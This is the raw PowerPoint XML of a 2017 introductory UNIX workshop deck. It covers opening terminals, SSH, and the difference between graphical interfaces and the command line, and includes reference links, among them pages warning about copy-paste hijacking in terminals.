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8"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="272" r:id="rId3"/>
    <p:sldId id="302" r:id="rId4"/>
    <p:sldId id="303" r:id="rId5"/>
    <p:sldId id="273" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="362" r:id="rId11"/>
    <p:sldId id="293" r:id="rId12"/>
    <p:sldId id="309" r:id="rId13"/>
    <p:sldId id="294" r:id="rId14"/>
    <p:sldId id="295" r:id="rId15"/>
    <p:sldId id="297" r:id="rId16"/>
    <p:sldId id="305" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="306" r:id="rId19"/>
    <p:sldId id="307" r:id="rId20"/>
    <p:sldId id="308" r:id="rId21"/>
    <p:sldId id="298" r:id="rId22"/>
    <p:sldId id="347" r:id="rId23"/>
    <p:sldId id="299" r:id="rId24"/>
    <p:sldId id="271" r:id="rId25"/>
    <p:sldId id="260" r:id="rId26"/>
    <p:sldId id="270" r:id="rId27"/>
    <p:sldId id="310" r:id="rId28"/>
    <p:sldId id="301" r:id="rId29"/>
    <p:sldId id="311" r:id="rId30"/>
    <p:sldId id="314" r:id="rId31"/>
    <p:sldId id="315" r:id="rId32"/>
    <p:sldId id="312" r:id="rId33"/>
    <p:sldId id="313" r:id="rId34"/>
    <p:sldId id="363" r:id="rId35"/>
    <p:sldId id="364" r:id="rId36"/>
    <p:sldId id="263" r:id="rId37"/>
    <p:sldId id="320" r:id="rId38"/>
    <p:sldId id="316" r:id="rId39"/>
    <p:sldId id="318" r:id="rId40"/>
    <p:sldId id="321" r:id="rId41"/>
    <p:sldId id="322" r:id="rId42"/>
    <p:sldId id="323" r:id="rId43"/>
    <p:sldId id="324" r:id="rId44"/>
    <p:sldId id="326" r:id="rId45"/>
    <p:sldId id="317" r:id="rId46"/>
    <p:sldId id="327" r:id="rId47"/>
    <p:sldId id="328" r:id="rId48"/>
    <p:sldId id="329" r:id="rId49"/>
    <p:sldId id="330" r:id="rId50"/>
    <p:sldId id="331" r:id="rId51"/>
    <p:sldId id="334" r:id="rId52"/>
    <p:sldId id="343" r:id="rId53"/>
    <p:sldId id="265" r:id="rId54"/>
    <p:sldId id="345" r:id="rId55"/>
    <p:sldId id="333" r:id="rId56"/>
    <p:sldId id="335" r:id="rId57"/>
    <p:sldId id="361" r:id="rId58"/>
    <p:sldId id="365" r:id="rId59"/>
    <p:sldId id="366" r:id="rId60"/>
    <p:sldId id="367" r:id="rId61"/>
    <p:sldId id="348" r:id="rId62"/>
    <p:sldId id="368" r:id="rId63"/>
    <p:sldId id="369" r:id="rId64"/>
    <p:sldId id="370" r:id="rId65"/>
    <p:sldId id="371" r:id="rId66"/>
    <p:sldId id="373" r:id="rId67"/>
    <p:sldId id="374" r:id="rId68"/>
    <p:sldId id="375" r:id="rId69"/>
    <p:sldId id="376" r:id="rId70"/>
    <p:sldId id="379" r:id="rId71"/>
    <p:sldId id="378" r:id="rId72"/>
    <p:sldId id="377" r:id="rId73"/>
    <p:sldId id="380" r:id="rId74"/>
    <p:sldId id="381" r:id="rId75"/>
    <p:sldId id="382" r:id="rId76"/>
    <p:sldId id="383" r:id="rId77"/>
    <p:sldId id="384" r:id="rId78"/>
    <p:sldId id="266" r:id="rId79"/>
    <p:sldId id="359" r:id="rId80"/>
    <p:sldId id="352" r:id="rId81"/>
    <p:sldId id="289" r:id="rId82"/>
    <p:sldId id="275" r:id="rId83"/>
    <p:sldId id="288" r:id="rId84"/>
    <p:sldId id="286" r:id="rId85"/>
    <p:sldId id="354" r:id="rId86"/>
    <p:sldId id="284" r:id="rId87"/>
    <p:sldId id="285" r:id="rId88"/>
    <p:sldId id="276" r:id="rId89"/>
    <p:sldId id="290" r:id="rId90"/>
    <p:sldId id="287" r:id="rId91"/>
    <p:sldId id="279" r:id="rId92"/>
    <p:sldId id="355" r:id="rId93"/>
    <p:sldId id="356" r:id="rId94"/>
    <p:sldId id="360" r:id="rId95"/>
    <p:sldId id="358" r:id="rId96"/>
    <p:sldId id="274" r:id="rId9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08E8"/>
    <a:srgbClr val="B8B5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28" d="100"/>
          <a:sy n="128" d="100"/>
        </p:scale>
        <p:origin x="9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B2342-F032-4C98-A698-4ABF0BBA46B0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/1/2017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51B23E-A38B-434C-915E-E87C997E9913}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128024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4D6CB4-4D3B-4368-B9F1-031554E8AC85}"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4085406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D6CB4-4D3B-4368-B9F1-031554E8AC85}"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272826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D6CB4-4D3B-4368-B9F1-031554E8AC85}"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330890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D6CB4-4D3B-4368-B9F1-031554E8AC85}"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831791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4D6CB4-4D3B-4368-B9F1-031554E8AC85}"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67376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4D6CB4-4D3B-4368-B9F1-031554E8AC85}"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2323528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4D6CB4-4D3B-4368-B9F1-031554E8AC85}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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8700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4D6CB4-4D3B-4368-B9F1-031554E8AC85}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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1441276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D6CB4-4D3B-4368-B9F1-031554E8AC85}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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119575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D6CB4-4D3B-4368-B9F1-031554E8AC85}"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34300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D6CB4-4D3B-4368-B9F1-031554E8AC85}"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1818841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D6CB4-4D3B-4368-B9F1-031554E8AC85}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/1/2017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6D3A6-C85C-4CDE-A12D-8DF8690DAB62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2015303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bcbgso@iastate.edu"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mmann/20170301-UNIX-BASIC-MATERIALS/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cmmann/basic-unix-worksho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thejh.net/misc/website-terminal-copy-paste" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.love/Pastejacking/"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www.linuxquestions.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="unix.stackexchange.org" TargetMode="Externa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93.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.linuxcommand.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dsl.org/cookbook/cookbook_toc.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.computerhope.com/unix/top.htm" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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s://goo.gl/forms/0atRg9YsBC98jMSP2"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hyperlink" Target="http://www.azquotes.com/picture-quotes/quote-this-is-the-unix-philosophy-write-programs-that-do-one-thing-and-do-it-well-write-programs-douglas-mcilroy-81-95-07.jpg" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.degree53.com/~/media/images/services/ios.ashx?h=500&amp;la=en&amp;w=500" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://1.bp.blogspot.com/-kkEEYNqfWmg/VppqCU65AGI/AAAAAAAACp8/bY-udsWhJek/s1600/1448026963685.png" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.macxdvd.com/mac-dvd-video-converter-how-to/article-image/mac-os-x.png" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://static.giantbomb.com/uploads/original/15/157771/2312719-a6.jpg" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://islascruz.org/blog/wp-content/uploads/2015/07/IMG_0455.jpg" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://upload.wikimedia.org/wikipedia/en/thumb/d/d0/Chrome_Logo.svg/1024px-Chrome_Logo.svg.png" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.clipartfest.com/473f0cf2f99c530d23c66dcb7e26acc1_server-clipart-server-computer-clipart_1791-2400.png" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://media.psu.com/media/articles/image/orbis2.png" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.clipartfest.com/04bed964c916ac933048f4aa6d9336f9_laptop-computer-clipart-free-clip-art-computer_6654-5300.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UNIX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BCBGSO Workshop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>March 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter: Carla Mann</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3219569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0: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Background/Getting Started</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0.1: GUIs and Command Lines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>0.2: Opening a Terminal Session on Mac</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>0.3: Opening a Terminal Session on Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>0.4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>SecureShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> (SSH)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>0.5: SSH on Mac/UNIX systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>0.6: SSH on Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>0.7: Finishing the Connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>0.8: Remaining Set-Up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>0.9: Tips and Tricks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176397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2781"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0.1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GUIs and Command Lines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406717" y="1835369"/>
            <a:ext cx="5859171" cy="1500504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>GUI: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>raphical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>nterface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Human-computer interface using windows, icons, menus, etc. that graphically represent computer code to be run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="406717" y="3621405"/>
            <a:ext cx="923925" cy="3028950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6535102" y="1825625"/>
            <a:ext cx="2428875" cy="4886325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 4" descr="Image result for mac gu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3552" y="3326129"/>
            <a:ext cx="4419600" cy="332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815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0.1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GUIs and Command Lines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You communicate with a GUI, which communicates with the hardware on your computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With a command line, you cut out the “middleman” and communicate directly with the hardware on your computer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2230623" y="3236414"/>
            <a:ext cx="1436970" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="B8B578"/>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641423" y="3051748"/>
            <a:ext cx="5126801" cy="369332"/>
            <a:chOff x="1641423" y="3051748"/>
            <a:chExt cx="5126801" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1641423" y="3051748"/>
              <a:ext cx="589200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>YOU</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3667593" y="3051748"/>
              <a:ext cx="535724" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>GUI</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5640287" y="3051748"/>
              <a:ext cx="1127937" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Computer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="5" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4203317" y="3236414"/>
              <a:ext cx="1436970" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="B8B578"/>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643923" y="5580090"/>
            <a:ext cx="589200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>YOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3670093" y="5580090"/>
            <a:ext cx="535724" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GUI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5642787" y="5580090"/>
            <a:ext cx="1127937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Computer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4205817" y="5764756"/>
            <a:ext cx="1436970" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="B8B578"/>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3"/>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2233123" y="5764756"/>
            <a:ext cx="1436970" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="B8B578"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Arc 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18999788">
            <a:off x="1346203" y="4793814"/>
            <a:ext cx="5024616" cy="4925307"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="47625">
            <a:solidFill>
              <a:srgbClr val="2308E8"/>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Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3207895" y="5224072"/>
            <a:ext cx="1514007" cy="1101777"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1809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260361" y="5286866"/>
            <a:ext cx="1461541" cy="1018574"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1809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61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0.1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GUIs and Command Lines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Everything you do with a GUI, you can do with a command line – provided you know the correct instructions.</a:t>
            </a:r>
          </a:p>
          <a:p>
